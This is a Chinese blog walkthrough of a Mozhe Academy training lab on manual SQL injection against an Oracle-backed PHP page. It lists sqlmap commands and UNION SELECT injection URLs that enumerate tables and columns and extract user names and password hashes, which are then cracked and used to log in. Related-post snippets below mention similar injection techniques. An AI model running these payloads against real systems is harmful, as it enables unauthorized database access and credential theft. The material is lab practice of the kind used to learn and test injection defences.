墨者学院SQL手工注入漏洞测试(Oracle数据库)--成功注入教程

最新推荐文章于 2024-04-12 13:04:35 发布
最新推荐文章于 2024-04-12 13:04:35 发布
阅读量749 收藏 5
点赞数 1
文章标签: 数据库 sql oracle python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1140037586/article/details/125393799
版权

我的靶机地址是http://124.70.71.251:41135/new_list.php?id=1

1、拿到地址首先直接用sqlmap开扫
python sqlmap.py -u http://124.70.71.251:41135/new_list.php?id=1 -dbs
扫在这里插入图片描述
2、查看当前使用的数据库
python sqlmap.py -u http://124.70.71.251:41135/new_list.php?id=1 -current-db
知道了当前使用的数据库是SYSTEM

在这里插入图片描述
获取当前数据库的表:
python sqlmap.py -u http://124.70.71.251:41135/new_list.php?id=1 -D SYSTEM -tables
可知表名为SNS_USERS
在这里插入图片描述
之后再使用sqlmap想查看字段名就不行了,接下来就使用手工注入,使用:
http://124.70.71.251:41135/new_list.php?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'null' from dual
查看字段名

在这里插入图片描述
查看第二个字段名

http://124.70.71.251:41135/new_list.php?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'null' from dual

在这里插入图片描述
获取最后的密码:

http://124.70.71.251:41135/new_list.php?id=-1 union select user_name,user_pwd from "sns_users" where user_name not in 'hu'

在这里插入图片描述
将密码md5解密后登陆系统
在这里插入图片描述

夏初春末_昊
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者_SQL手工注入漏洞测试(Oracle数据库)
weixin_50698958的博客
10-20 1550
靶场: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+Oracle,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Oracle的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行
360众测靶场题库之81- SQL手工注入漏洞测试(Oracle数据库)
zjl12344的博客
03-12 201
360众测靶场题库
干货 Oracle注入漏洞利用姿势总结
最新发布
2401_84187635的博客
04-12 420
if ‘SMITH’ in res.text: # 为真时,即判断正确的时候的条件。(img-kmpW0H3S-1712898206497)](img-WvSzEJXT-1712898206497)](img-gC5fie7O-1712898206498)](img-lNMktoxz-1712898206498)]到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。– 授予相关 Java 权限。– 撤销相关 Java 权限。– 发起 HTTP 请求。– 发起 DNS 请求。
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1124
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
第15篇:WEB漏洞~SQL注入~Oracle、MongoDB等注入
廖一语山的博客
06-18 329
注入工具
Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
T1ngSh0w的博客
09-08 1534
Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2141
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
ORACLE数据库手工注入详解.doc
04-08
ORACLE数据库手工注入详解
oracle_初级教程
03-26
oracle 的初级教程,详细介绍了oracle入门所要掌握的技术,十分详细明了!
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5117
墨者学院-SQL注入漏洞测试(报错盲注)
PostgreSQL数据库注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据库))
T1ngSh0w的博客
09-06 1476
PostgreSQL数据库注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据库)
oracle宽字节注入,SQL注入漏洞
weixin_36075657的博客
04-04 442
漏洞简介SQL注入漏洞是一种将SQL代码插入或添加到应用输入的参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。漏洞危害1.数据库内的信息被窃取,篡改2.服务器上的文件被读取或修改3.命令执行......漏洞分类1.根据参数类型①数字型网页链接类似于http://xxx.com/index.php?id=1,注入点id类型为数字型。SQL语句一般为:select * from ...
SQL手工注入漏洞测试(Oracle数据库)
weixin_52374319的博客
05-15 1043
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn) 0x02 判断注入点 跟其他数据库一样,检测注入点都是可以通过拼接and语句进行判断。这里通过and 1=1 和and 1=2进行判断。实战中还可以通过延时函数进行判断。 http://124.70.71.251:44530/new_list.php?id=1%2
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4931
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
Oracle数据库手工注入
只为成最好的自己
09-27 5417
一、出现注入点的原因:程序员在编写代码时没有对用户输入的字符进行特殊处理。导致用户输入的特殊字符附带在参数中直接与数据库进行交互。 二、注入过程 1、打开一个连接地址:在网址后面加and 1=1 正常,and 1=2 错误。说明存在注入漏洞、 2、判断一下数据库中的表 and (select count(*) from admin) 3、判断一下该网站有几个管理员。 and
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值